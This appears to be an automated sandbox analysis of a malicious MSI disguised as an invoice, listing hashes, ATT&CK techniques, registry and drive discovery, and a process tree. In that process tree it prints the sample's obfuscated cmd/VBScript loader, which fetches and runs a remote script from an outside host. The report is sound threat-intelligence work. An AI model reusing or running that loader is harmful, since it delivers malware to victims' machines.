17771bd38e0bf7cf7f0118e70ccfe3fedbf1c8a4a5b426aacd62a8bbb31fa68c

Analysis

max time kernel
443s
max time network
458s
platform
windows10-2004_x64
resource
win10v2004-20240226-es
resource tags

arch:x64arch:x86image:win10v2004-20240226-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
06/03/2024, 19:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

S-FACTURA2030𝕗𝟘𝟡20049059039057⃣6⃣7⃣07jlJ.msi
Size

408KB
MD5

74713b38f7fc6dad893684948b941e65
SHA1

3090154f42e728f7c1de36f1e7c9e78075a3d999
SHA256

17771bd38e0bf7cf7f0118e70ccfe3fedbf1c8a4a5b426aacd62a8bbb31fa68c
SHA512

f2d7b544afc6e4b1f731cefca7472fcc39fc39d259aee5cb1d8bec2f441729c3366780c5304de5e0d42e4b74566f0e42c04ea40db192e09aee50dd31a76d28a6
SSDEEP

6144:d7XaD+m4jXhtzPEBxB0Z1h1a93j3GruNmdDxjOCdx:dLPm4jxtzPEfBAMyruNm7dx

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
42	1520	WScript.exe
46	1520	WScript.exe
49	1520	WScript.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e57e399.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57e399.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE484.tmp	msiexec.exe

Loads dropped DLL 1 IoCs

pid	Process
860	MsiExec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000007d3392e9fd415b840000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800007d3392e90000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809007d3392e9000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d7d3392e9000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007d3392e900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3980	msiexec.exe
3980	msiexec.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3960	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3960	msiexec.exe
Token: SeSecurityPrivilege	3980	msiexec.exe
Token: SeCreateTokenPrivilege	3960	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3960	msiexec.exe
Token: SeLockMemoryPrivilege	3960	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3960	msiexec.exe
Token: SeMachineAccountPrivilege	3960	msiexec.exe
Token: SeTcbPrivilege	3960	msiexec.exe
Token: SeSecurityPrivilege	3960	msiexec.exe
Token: SeTakeOwnershipPrivilege	3960	msiexec.exe
Token: SeLoadDriverPrivilege	3960	msiexec.exe
Token: SeSystemProfilePrivilege	3960	msiexec.exe
Token: SeSystemtimePrivilege	3960	msiexec.exe
Token: SeProfSingleProcessPrivilege	3960	msiexec.exe
Token: SeIncBasePriorityPrivilege	3960	msiexec.exe
Token: SeCreatePagefilePrivilege	3960	msiexec.exe
Token: SeCreatePermanentPrivilege	3960	msiexec.exe
Token: SeBackupPrivilege	3960	msiexec.exe
Token: SeRestorePrivilege	3960	msiexec.exe
Token: SeShutdownPrivilege	3960	msiexec.exe
Token: SeDebugPrivilege	3960	msiexec.exe
Token: SeAuditPrivilege	3960	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3960	msiexec.exe
Token: SeChangeNotifyPrivilege	3960	msiexec.exe
Token: SeRemoteShutdownPrivilege	3960	msiexec.exe
Token: SeUndockPrivilege	3960	msiexec.exe
Token: SeSyncAgentPrivilege	3960	msiexec.exe
Token: SeEnableDelegationPrivilege	3960	msiexec.exe
Token: SeManageVolumePrivilege	3960	msiexec.exe
Token: SeImpersonatePrivilege	3960	msiexec.exe
Token: SeCreateGlobalPrivilege	3960	msiexec.exe
Token: SeBackupPrivilege	1584	vssvc.exe
Token: SeRestorePrivilege	1584	vssvc.exe
Token: SeAuditPrivilege	1584	vssvc.exe
Token: SeBackupPrivilege	3980	msiexec.exe
Token: SeRestorePrivilege	3980	msiexec.exe
Token: SeRestorePrivilege	3980	msiexec.exe
Token: SeTakeOwnershipPrivilege	3980	msiexec.exe
Token: SeRestorePrivilege	3980	msiexec.exe
Token: SeTakeOwnershipPrivilege	3980	msiexec.exe
Token: SeBackupPrivilege	4896	srtasks.exe
Token: SeRestorePrivilege	4896	srtasks.exe
Token: SeSecurityPrivilege	4896	srtasks.exe
Token: SeTakeOwnershipPrivilege	4896	srtasks.exe
Token: SeBackupPrivilege	4896	srtasks.exe
Token: SeRestorePrivilege	4896	srtasks.exe
Token: SeSecurityPrivilege	4896	srtasks.exe
Token: SeTakeOwnershipPrivilege	4896	srtasks.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3960	msiexec.exe
3960	msiexec.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 3980 wrote to memory of 4896	3980	msiexec.exe	101
PID 3980 wrote to memory of 4896	3980	msiexec.exe	101
PID 3980 wrote to memory of 860	3980	msiexec.exe	103
PID 3980 wrote to memory of 860	3980	msiexec.exe	103
PID 3980 wrote to memory of 860	3980	msiexec.exe	103
PID 860 wrote to memory of 5104	860	MsiExec.exe	105
PID 860 wrote to memory of 5104	860	MsiExec.exe	105
PID 860 wrote to memory of 5104	860	MsiExec.exe	105
PID 5104 wrote to memory of 1848	5104	cmD.exe	107
PID 5104 wrote to memory of 1848	5104	cmD.exe	107
PID 5104 wrote to memory of 1848	5104	cmD.exe	107
PID 1848 wrote to memory of 1520	1848	cmd.exe	108
PID 1848 wrote to memory of 1520	1848	cmd.exe	108
PID 1848 wrote to memory of 1520	1848	cmd.exe	108

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\S-FACTURA2030𝕗𝟘𝟡20049059039057⃣6⃣7⃣07jlJ.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3960

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3980
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4896
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 1237B4B60311B107C9C87E396542B225
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:860
- - C:\Windows\SysWOW64\cmD.exe
    cmD /V/D/c EcHo f5302=".":FunctIon m3y6n7(s2lp3):ijd4x7=Array(":","t","r","c","1"):m3y6n7=ijd4x7(s2lp3):end function:be16="S"+m3y6n7(3)+"rip"+m3y6n7(1)+m3y6n7(0)+"hT"+m3y6n7(1)+"ps://contdk"+f5302+"bounceme"+f5302+"net/g1":eval("Ge"+m3y6n7(1)+"Obje"+m3y6n7(3)+m3y6n7(1)+"(be16)")>nul>C:\Users\Public\^q8s12.vbs&c:\windows\system32\cmd /c start C:\Users\Public\q8s12.vbs
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5104
  - - \??\c:\windows\SysWOW64\cmd.exe
      c:\windows\system32\cmd /c start C:\Users\Public\q8s12.vbs
      4⤵
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:1848
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\q8s12.vbs"
        5⤵
        Blocklisted process makes network request
        
        PID:1520

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\q8s12.vbs

Filesize
265B

MD5
9b77e4645c879280fc3e5e4cd02e211b

SHA1
22c1a2c21cefaef3aa4f4a85a8fb3db7bc9a2ab0

SHA256
8ea673f42e32594751d8fb57299f114e45c68896d09675ff421777e599c87f13

SHA512
594cc8bdc9c43bc3873804722803e37c3a47930ea39e2033ee4cd364f9ad6ca84b00f228a6494ba5d222afc176f32800ba92e3eb32f362b41848061114c0b45b

Download Submit
C:\Windows\Installer\MSIE484.tmp

Filesize
377KB

MD5
3d72c225720dd7a2c627b6728cc8a488

SHA1
01c5fa512e04579bc5ac3c8a950c60406eed7f97

SHA256
616b4e543e8eb5ee4443cc230dd16dc46b931e25e3a8ce8992eccd3b94858ac5

SHA512
6c2ecb89deb2ea9dd6da5f191714a5694dda7349e7c3098f48eca2b06ab37949d7bf175d44f476dc2f34999eb7bdf1d565e098ddeb7d4115b79bff8a50a959e8

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
12.7MB

MD5
b7e5633d9ec9326f20e743d9b523b47e

SHA1
948b52cf1ec6af01de6ad76e76829b2a0bbc361d

SHA256
65c14bfe8a7cc4f910eaa8378a2dfffe73cd7f1555d2fe971955cf8ec7d0bdc6

SHA512
c42d2277ee118773a4b93bf7308cc828029fd1f909a29c37836fd755be0c74305b53f637abe273fcc15ddc40c1f2f96216d4a9c7c35b007469bec5e79c500991

Download Submit
\??\Volume{e992337d-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{90c96acb-b4d1-4a69-9c4d-0534755950a6}_OnDiskSnapshotProp

Filesize
6KB

MD5
ba2b8f221da40685ad7521f4a25f1f0f

SHA1
e2c94e140e53bae55ef53813987dcdfe6b2f14b2

SHA256
42fe9a087e31a70c97b1583bb3234f33a55b4e63d4302a9f0f5d2d1e03d9e342

SHA512
4c5837e7088ea58da5d06468224a1458be00ac69b282d8533f91a122ad210da95941db71edbab060030a03f9008fa473fa145ea433f8dc51996d8902bdcd84ff

Download Submit